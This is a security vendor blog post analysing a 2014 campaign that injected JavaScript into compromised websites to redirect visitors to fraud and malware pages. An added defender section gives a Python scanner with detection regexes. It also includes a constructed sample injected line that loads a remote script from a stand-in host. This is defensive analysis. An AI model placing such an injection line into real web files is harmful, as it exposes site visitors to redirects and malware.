
This post is co-authored with Levi Gundert and Andrew Tsonchev.

Update 2014-03-21: For clarity, the old kernel is a common indicator on the compromised hosts. We are still investigating the vulnerability, and do not yet know what the initial vector is, only that the compromised hosts are similarly ‘old’.

Update 2014-03-22: This post’s focus relates to a malicious redirection campaign driven by unauthorized access to thousands of websites. The observation of affected hosts running Linux kernel 2.6 is anecdotal and in no way reflects a universal condition among all of the compromised websites. Accordingly, we have adjusted the title for clarity. We have not identified the initial exploit vector for the stage zero URIs. It was not our intention to conflate our anecdotal observations with the technical facts provided in the listed URIs or other demonstrable data, and the below strike through annotations reflect that. We also want to thank the community for the timely feedback.


TRAC has recently observed a large malicious web redirect campaign affecting hundreds of websites. Attackers compromised legitimate websites, inserting JavaScript that redirects visitors to other compromised websites. All of the affected web servers that we have examined use the Linux 2.6 kernel. Many of the affected servers are using Linux kernel versions first released in 2007 or earlier. It is possible that attackers have identified a vulnerability on the platform and have been able to take advantage of the fact that these are older systems that may not be continuously patched by administrators.


The attack itself happens in multiple stages. Attackers compromise an existing website and append a line of JavaScript to multiple .js files hosted on the site. This causes visitors to load and run a new JavaScript file served from a second compromised host. Using a two-stage process allows attackers to serve a variety of malicious content to the visitor. We observed the second-stage sites serving what appear to be pay-per-view fraud pages, where the visitor’s browser loads multiple advertisements to generate revenue for the attacker. However, there is anecdotal evidence that visitors have been infected with Trojan malware as part of this final step.

The line appended to the .js files takes the form of:
[Figure: the JavaScript line appended to the compromised .js files]

Two comments containing a hexadecimal colour reference flank an instruction to the browser to download JavaScript from a PHP file on a second compromised website. The name of this PHP file always follows the same pattern: eight mixed-case alphanumeric characters, with a parameter accepting an eight-digit id value. The PHP file only responds once per id value: on the first request it returns malicious JavaScript to be executed in the visitor’s browser, and on any subsequent request for the same id it returns a 403 Forbidden error.
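As an added defender-side example (not code from the original post), the pattern described above can be turned into a simple scan of a site's .js files and of web proxy logs. The exact syntax of the appended line is not reproduced on this page, so the sample .js content and log lines below are constructed from the description only; the hostnames, the `id` parameter name and the log format are assumptions.

```python
import re

# Constructed sample .js content. The injected line is modelled only on this
# page's description (two colour-code comments flanking a script load from an
# 8-character .php name with an 8-digit id); the real line is not reproduced here.
SAMPLE_JS = """function legit() { return 1; }
/*#a1b2c3*/document.write('<script src="http://stage1.invalid/aB3dE9fG.php?id=12345678"></script>');/*#a1b2c3*/
"""

# Constructed proxy log lines (client, method, URL, status); format is assumed.
SAMPLE_LOG = [
    "10.0.0.5 GET http://legit.invalid/site.js 200",
    "10.0.0.5 GET http://stage1.invalid/aB3dE9fG.php?id=12345678 200",
    "10.0.0.9 GET http://stage1.invalid/aB3dE9fG.php?id=12345678 403",
]

# A comment holding a six-digit hexadecimal colour reference, e.g. /*#a1b2c3*/.
COLOUR_COMMENT = r"/\*\s*#?[0-9a-fA-F]{6}\s*\*/"
# Exactly eight alphanumeric characters, .php, then one parameter carrying an 8-digit id.
PHP_LOADER = r"\b[A-Za-z0-9]{8}\.php\?[A-Za-z_]+=\d{8}\b"

INJECT_RE = re.compile(COLOUR_COMMENT + r".*?" + PHP_LOADER + r".*?" + COLOUR_COMMENT)
LOADER_RE = re.compile(PHP_LOADER)


def find_injected_lines(js_text):
    """Return (line_number, line) for each line of js_text matching the appended-line pattern."""
    return [(n, line.strip()) for n, line in enumerate(js_text.splitlines(), 1)
            if INJECT_RE.search(line)]


def flag_loader_requests(log_lines):
    """Return (client, url, status) for proxy requests to a second-stage loader URL.

    A 403 on a repeat request for the same id is consistent with the once-per-id
    behaviour described above, so repeats are reported as well as first hits.
    """
    flagged = []
    for entry in log_lines:
        client, _method, url, status = entry.split()
        if LOADER_RE.search(url):
            flagged.append((client, url, int(status)))
    return flagged


if __name__ == "__main__":
    for n, line in find_injected_lines(SAMPLE_JS):
        print(f"suspect .js line {n}: {line[:60]}...")
    for client, url, status in flag_loader_requests(SAMPLE_LOG):
        print(f"{client} requested {url} -> {status}")
```

On a real host, feed each .js file's contents to `find_injected_lines` and the proxy's access log to `flag_loader_requests`; the regexes are deliberately narrow, so a clean file with ordinary colour comments produces no hits.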

Many of the affected hosts have been identified as compromised and cleaned.
An example response message from a cleaned tier one host.

AV products may detect the JavaScript redirect as being similar to that previously used in the Blackhole exploit kit. However, we have no evidence to suggest that this campaign is related to Blackhole rather than an example of code reuse. Indeed, this may be related to the Mesh Network identified by Sucuri.

The attack has spread rapidly, with almost 400 distinct hosts affected on each of March 17 and 18.
[Figure: distinct hosts affected per day]

At the time of writing, we have identified in excess of 2700 URLs that have been utilised in this attack. The attackers have subverted existing, legitimate websites to affect unsuspecting users. Security awareness campaigns that train users to be wary of unknown websites may not be effective against trusted websites that become compromised to serve malware. Although users of Cisco’s Cloud Web Security solution are protected from this attack, we observe that approximately 1 in 15 of our clients have had at least one user who has been intercepted attempting to request an affected URL.

The servers affected by the attack are distributed throughout the world, with a particularly high incidence in Germany and the USA.
[Figure: distribution of affected servers by country]

This large scale compromise of an aging operating system highlights the risks posed by leaving such systems in operation. Systems that are unmaintained or unsupported are no longer patched with security updates. When attackers discover a vulnerability in the system, they can exploit it at their whim without fear that it will be remedied. In April 2014, Windows XP will become unsupported. Organisations urgently need to review their use of unsupported systems in operation. Such systems need to be upgraded where possible, or regularly monitored to detect compromise. Organisations should consider their exposure to risks from the use of unsupported systems by partners and suppliers, in addition to the dangers of user interaction with such systems over the internet.

Large numbers of vulnerable unpatched systems on the internet are tempting targets for attackers. Such systems can be used as disposable one-shot platforms for launching attacks. This makes it all the more important that aging systems are properly maintained and protected.

Identified tier 0 and tier 1 affected web sites.

Authors

Martin Lee

EMEA Lead, Strategic Planning & Communications

Cisco Talos